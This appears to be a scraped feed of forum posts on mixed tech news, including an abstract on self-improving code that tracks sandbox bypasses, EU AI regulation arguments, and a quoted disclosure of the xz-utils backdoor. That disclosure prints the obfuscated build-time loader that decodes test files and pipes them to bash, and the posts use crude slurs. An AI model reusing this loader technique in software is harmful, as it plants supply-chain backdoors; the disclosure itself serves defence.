None

@lain @LinuxShill idk who else to ping but I'm starting to learn these things and she'd absolutely wipe the floor with me. She even mentions bloat, at this rate I wonder if she shitposts on /g/ in between making tutorials

None
None

source for that is https://www.theinformation.com/articles/how-amazons-big-bet-on-just-walk-out-stumbled, which I cannot bypass the paywall on :marseyshrug:

None
None
41
Pure, distilled, blue-meth autism vs. Something about Chinx and Linux

4chan explains it better

https://i.rdrama.net/images/1712087897028019.webp

!nooticers you need to nootice harder

None
None

Do you we think Zuck paid for this article to counter his awkward UFC experience?

https://www.mensjournal.com/news/mark-zuckerberg-ufc-meme

https://media.giphy.com/media/zpl0jkntzFqZLXh235/giphy.webp

None
25
Me and who?
None

Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation

This is the repo for the paper: Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation

@article{zelikman2023self, title={Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation}, author={Eric Zelikman, Eliana Lorch, Lester Mackey, Adam Tauman Kalai}, journal={arXiv preprint arXiv:2310.02304}, year={2023} }

Abstract: Several recent advances in AI systems (e.g., Tree-of-Thoughts and Program-Aided Language Models) solve problems by providing a "scaffolding" program that structures multiple calls to language models to generate better outputs. A scaffolding program is written in a programming language such as Python. In this work, we use a language-model-infused scaffolding program to improve itself. We start with a seed "improver" that improves an input program according to a given utility function by querying a language model several times and returning the best solution. We then run this seed improver to improve itself. Across a small set of downstream tasks, the resulting improved improver generates programs with significantly better performance than its seed improver. Afterward, we analyze the variety of self-improvement strategies proposed by the language model, including beam search, genetic algorithms, and simulated annealing. Since the language models themselves are not altered, this is not full recursive self-improvement. Nonetheless, it demonstrates that a modern language model, GPT-4 in our proof-of-concept experiments, is capable of writing code that can call itself to improve itself. We critically consider concerns around the development of self-improving technologies and evaluate the frequency with which the generated code bypasses a sandbox.

None

:marseysnoo:

https://old.reddit.com/r/groomercordapp/comments/1brxqrp/groomercord_to_start_showing_ads_for_g?sort=controversial*mers_to_boost/

https://old.reddit.com/r/technology/comments/1brxt4u/groomercord_to_start_showing_ads_for_g?sort=controversial*mers_to_boost/

:marseymouse:

https://lemmy.world/post/13762503?scrollToComments=true


archive

None

Linked xeet https://twitter.com/illyism/status/1774425117117788223

Every time you share a @GIPHY, you send your data to:

checks notes

816 partners 🤯🤯🤯

None

EU just ruins things because they can't build anything.

AI often isn't available because of obscure laws. chatGPT had been blocked for a month. Gemini is not available right now. A disaster.

Bureaucrats want to show that they exist.

To my knowledge they've never been "blocked". Google simply didn't release them in the EU for a while.

By delaying something introducing stupid regulations, they block it.

Personally I don't want to be drinking polluted water, eat unsanitary food, live in a place where all housing is owned by a handful of entities that engage in price-fixing, work 80 hours a week in an environment when response to mass worker suicides is to install suicide nets, have my privacy violated by private corporations (foreign or domestic) or have my insurance rates tripled by some opaque discriminatory AI, but you do you in whatever dystopian future you dream of.

You're just a low life europoor communist.


EU just wants to kill tech, because its ever changing nature means that they can't control it.


Quite the opposite, in EU there is no innovation because only big tech can comply with regulation.


EU is just hurting its own startups.

USA, India, China. They all have multibillion AI companies. EU doesn't because nobody wants to deal with unpredictable lawmakers

Edit: @dang came and mopped up, RIP _giorgio_

Edit 2: actually _giorgio_ didn't get banned :marseymindblown:

None
None
128
Backdoors

I wanna be a janny :marseyjanny2:

None
45
Too soon

Palestinian lives matter

None

Palestinian lives matter

None

@X explain your country

Palestinian lives matter

None

https://mastodon.social/@AndresFreundTec/112180083704606941

https://i.rdrama.net/images/17118260510016828.webp

linuxbros.. how will we recover?? i think its time to admit that windows is superior

None
None

People are throwing around accusations of compromised github accounts left and right :marseyschizowall: !codecels get in here and start accusing people of being bad actors :marseyglow2:

None

https://i.rdrama.net/images/1711789965756554.webp

The recently-enacted European Digital Services Act (DSA) gives the Dublin-based body substantial enforcement powers over social media and video platforms in the area of policing illegal and hateful content.

The Irish regulator has been seeking to recruit trusted flaggers on three-year terms, with specific conditions and rules against conflicts of interest attached. It says that while experience in reporting hateful and illegal content is an advantage, it's not a pre-requisite.

“Approved Trusted Flaggers will have a fast lane when reporting suspected illegal content, where online platforms will be legally obliged to give their notices priority, and to process and decide on these reports without undue delay,” the regulator says on its ‘flaggers' application form

Areas to be policed include illegal speech such as discrimination and hate speech, non-consensual behaviour, online bullying and “negative effects on civic discourse or elections”. It also includes scams, offences to minors, sexual-based abuse, incitement to self-harm and other topics.

None

:#marseymanysuchcases:

None

== Compromised Release Tarball ==

One portion of the backdoor is solely in the distributed tarballs. For

easier reference, here's a link to debian's import of the tarball, but it is

also present in the tarballs for 5.6.0 and 5.6.1:

https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63

That line is not in the upstream source of build-to-host, nor is

build-to-host used by xz in git. However, it is present in the tarballs

released upstream, except for the "source code" links, which I think github

generates directly from the repository contents:

https://github.com/tukaani-project/xz/releases/tag/v5.6.0

https://github.com/tukaani-project/xz/releases/tag/v5.6.1

This injects an obfuscated script to be executed at the end of configure. This

script is fairly obfuscated and data from "test" .xz files in the repository.

This script is executed and, if some preconditions match, modifies

$builddir/src/liblzma/Makefile to contain

am__test = bad-3-corrupt_lzma2.xz

...

am__test_dir=$(top_srcdir)/tests/files/$(am__test)

...

sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

which ends up as

...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " -_" " _-" | xz -d | /bin/bash >/dev/null 2>&1; ...

Leaving out the "| bash" that produces

####Hello####

#��Z�.hj�

eval grep ^srcdir= config.status

if test -f ../../config.status;then

eval grep ^srcdir= ../../config.status

srcdir="../../$srcdir"

fi

export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh

####World####

After de-obfuscation this leads to the attached injected.txt.

== Compromised Repository ==

The files containing the bulk of the exploit are in an obfuscated form in

tests/files/bad-3-corrupt_lzma2.xz

tests/files/good-large_compressed.lzma

committed upstream. They were initially added in

https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

Note that the files were not even used for any "tests" in 5.6.0.

Subsequently the injected code (more about that below) caused valgrind errors

and crashes in some configurations, due the stack layout differing from what

the backdoor was expecting. These issues were attempted to be worked around

in 5.6.1:

https://github.com/tukaani-project/xz/commit/e5faaebbcf02ea880cfc56edc702d4f7298788ad

https://github.com/tukaani-project/xz/commit/72d2933bfae514e0dbb123488e9f1eb7cf64175f

https://github.com/tukaani-project/xz/commit/82ecc538193b380a21622aea02b0ba078e7ade92

For which the exploit code was then adjusted:

https://github.com/tukaani-project/xz/commit/6e636819e8f070330d835fce46289a3ff72a7b89

Given the activity over several weeks, the committer is either directly

involved or there was some quite severe compromise of their

system. Unfortunately the latter looks like the less likely explanation, given

they communicated on various lists about the "fixes" mentioned above.

!chuds !nonchuds CHECK YO SELF. YEAR OF THE LINUX DESKTOP 2024 :marseysal:

None
None
182
NYC creates AI chatbot to help people understand NY law and it immediately starts telling people to break the law

Great thread from Kathryn Tewson about how rslurred this thing is

Based AI telling employer to take worker's tips lmao

https://i.rdrama.net/images/17117284401529386.webp

Link copied to clipboard
Action successful!
Error, please refresh the page and try again.